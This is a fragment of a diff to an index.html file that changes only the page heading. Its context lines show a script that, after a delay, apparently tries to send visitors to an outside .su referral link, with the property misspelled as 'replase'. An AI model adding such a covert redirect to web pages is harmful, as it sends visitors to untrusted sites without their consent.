--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
 
 <body>
 
-				<h1> VLDPROD </h1>
+				<h1> VLDPPROD </h1>
 <script>
 setTimeout(function() {
   window.location.replase = "https://www.people-group.su/?r=337781";
